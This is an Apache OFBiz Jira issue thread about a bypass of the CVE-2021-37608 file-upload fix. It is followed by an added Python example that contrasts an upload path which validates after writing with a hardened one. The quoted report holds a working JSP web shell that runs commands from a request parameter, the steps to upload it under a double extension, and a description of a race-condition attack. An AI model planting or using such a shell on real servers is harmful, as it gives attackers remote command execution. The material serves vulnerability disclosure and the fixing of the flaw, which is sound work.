[ 
https://issues.apache.org/jira/browse/OFBIZ-12307?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17447869#comment-17447869
 ] 

Pierre Smits commented on OFBIZ-12307:
--------------------------------------

Good morning Jacques,

Of course... A patch file uploaded by a contributor can be taken by a third 
party, included in his/her/their fork and presented/committed there as 
his/her/their own work. This is unfavourable, as it would not show up as the 
contributor's contribution to the OFBiz project. Uploading patch files (or 
asking for them) should therefore be discouraged, and submitting PRs 
encouraged instead.

> CVE-2021-37608 vulnerability bypass
> -----------------------------------
>
>                 Key: OFBIZ-12307
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12307
>             Project: OFBiz
>          Issue Type: Sub-task
>    Affects Versions: 17.12.08
>            Reporter: thiscodecc
>            Assignee: Jacques Le Roux
>            Priority: Major
>              Labels: security
>             Fix For: Release Branch 17.12, 18.12.01
>
>         Attachments: OFBIZ-12307-addAdditionalViewForProduct.patch, 
> image-2021-11-22-18-14-50-370.png
>
>
> The patch 
> ([https://github.com/apache/ofbiz-framework/commit/8d49af4/#diff-75dac0d18a6bc59554dded12b9b01563651e05a2df6cede9d7d3e2b42b7fc382])
>  for the CVE-2021-37608 vulnerability can be bypassed.
> Verification process:
> 1. Create a new xx.png.jsp file.
> The content of the xx.png.jsp file is:
> <%
> // Runs the command passed in the "i" parameter and echoes its output.
> java.io.InputStream in =
>     Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
> int a = -1;
> byte[] b = new byte[2048];
> out.print("<pre>");
> while ((a = in.read(b)) != -1) {
>     // Only the 'a' bytes just read are valid; the rest of 'b' is stale.
>     out.println(new String(b, 0, a));
> }
> out.print("</pre>");
> %>
> 2. Upload the xx.png.jsp file directly.
> 3. Visit the JSP Trojan address 
> "https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"
>  
> I carefully analyzed the code of this logic again and found multiple problems.
> The reasons for the vulnerabilities are:
> The file is uploaded first here.
>  
> [https://github.com/apache/ofbiz-framework/blob/trunk/applications/product/src/main/java/org/apache/ofbiz/product/imagemanagement/ImageManagementServices.java#L159-#L162]
> When verifying the file name, because the file name is "xx.png.jsp", 
> "wrongFile=true".
>  
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L128]
> Because "wrongFile=true", the isValidFile method exits early.
>  
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L137]
> So the malicious file is not deleted.
>  
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L215]
> The above is the reason for the vulnerability mentioned in my last email.
> I also found a new problem. The code logic used to verify the file upload is 
> to upload the file first and then delete it after judging that it is 
> malicious. This creates a race condition loophole.
> Use multiple threads to upload the xxx.jsp file, and then keep accessing the 
> xxx.jsp file. Since OFBiz adopts the verification rule of uploading and then 
> deleting, xxx.jsp will be uploaded successfully, and before OFBiz has 
> successfully deleted "xxx.jsp", the "xxx.jsp" file is requested by the 
> attacker first. This creates an arbitrary file upload vulnerability.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)
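Added example, not OFBiz code and not the reporter's: it models the two defects described in the quoted report side by side. `vulnerable_upload` follows the "write into the served directory, validate, then delete" ordering and exposes the window in which a concurrent request can fetch the file; `hardened_upload` validates the name (every suffix, not just the last) and the content before any byte is written, writes into a non-served quarantine directory and moves the file into place with an atomic rename. The directory layout, the allow-list of image suffixes, the `during_check` hook that stands in for the attacker's request, and the helper names are assumptions made for this example; the sample inputs in `demo()` are constructed.

```python
"""Added example (not OFBiz code): upload validation ordering and suffix checks.
Directory names, helper names, the allow-list and the sample inputs are
assumptions made for this illustration."""
import os
import tempfile
from pathlib import Path
from typing import Callable, Optional

# Assumed policy: a product image upload may only carry one of these suffixes.
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}
# Suffixes a servlet container may execute. They are rejected at ANY position
# in the name, so xx.png.jsp and xx.jsp.png both fail.
EXECUTABLE_SUFFIXES = {".jsp", ".jspx", ".jspf", ".jsw", ".jsv"}
# Magic bytes of the allowed image types (PNG, JPEG, GIF87a, GIF89a).
_IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")


def is_safe_name(name: str) -> bool:
    """Reject path components, hidden files and any executable suffix;
    the final suffix must be an allowed image type."""
    if not name or name != os.path.basename(name) or name.startswith("."):
        return False
    suffixes = [s.lower() for s in Path(name).suffixes]
    if not suffixes or any(s in EXECUTABLE_SUFFIXES for s in suffixes):
        return False
    return suffixes[-1] in ALLOWED_SUFFIXES


def looks_like_image(data: bytes) -> bool:
    """Cheap content check: the leading bytes must match an image signature."""
    return data.startswith(_IMAGE_MAGIC)


def vulnerable_upload(name: str, data: bytes, served_dir: str,
                      during_check: Optional[Callable[[str], None]] = None) -> bool:
    """The ordering the report describes: write into the served tree first,
    validate afterwards, delete on failure. `during_check` stands in for an
    attacker's concurrent GET and runs while the file is on disk."""
    dest = os.path.join(served_dir, name)
    with open(dest, "wb") as f:      # from here on the file is reachable
        f.write(data)
    if during_check is not None:
        during_check(dest)
    ok = is_safe_name(name) and looks_like_image(data)
    if not ok:
        os.remove(dest)              # too late if it was already fetched
    return ok


def hardened_upload(name: str, data: bytes, served_dir: str,
                    quarantine_dir: str) -> Optional[str]:
    """Validate first. Only then write, into a directory the web server does
    not serve, and publish with an atomic rename, so no unvalidated byte ever
    exists under served_dir. Assumes both directories share a filesystem."""
    if not (is_safe_name(name) and looks_like_image(data)):
        return None
    fd, tmp = tempfile.mkstemp(dir=quarantine_dir)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        dest = os.path.join(served_dir, name)
        os.replace(tmp, dest)        # atomic on the same filesystem
    except BaseException:
        if os.path.exists(tmp):
            os.remove(tmp)
        raise
    return dest


def demo() -> dict:
    """Constructed inputs: a PNG header and a harmless JSP body under a
    disguised double-extension name, run through both code paths."""
    base = tempfile.mkdtemp()
    served = os.path.join(base, "images")
    quarantine = os.path.join(base, "quarantine")
    os.mkdir(served)
    os.mkdir(quarantine)
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    jsp = b'<% out.println("constructed"); %>'
    seen = []
    vulnerable_upload("xx.png.jsp", jsp, served,
                      during_check=lambda path: seen.append(os.path.exists(path)))
    return {
        "race_window_observed": seen == [True],
        "vulnerable_left_file": os.path.exists(os.path.join(served, "xx.png.jsp")),
        "hardened_rejects_jsp": hardened_upload("xx.png.jsp", jsp, served, quarantine) is None,
        "hardened_rejects_renamed_jsp": hardened_upload("xx.png", jsp, served, quarantine) is None,
        "hardened_accepts_png": hardened_upload("xx.png", png, served, quarantine) is not None,
        "served_dir_contents": sorted(os.listdir(served)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of `race_window_observed` is that the vulnerable path does eventually delete the file, yet a request that lands between the write and the delete is still served it; the hardened path never has such a window because rejection happens before any write, and the accepted file becomes visible only at the rename. The content check is deliberately shallow (signature bytes only); a deployment would additionally decode the image and re-encode it rather than trusting the upload's bytes.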
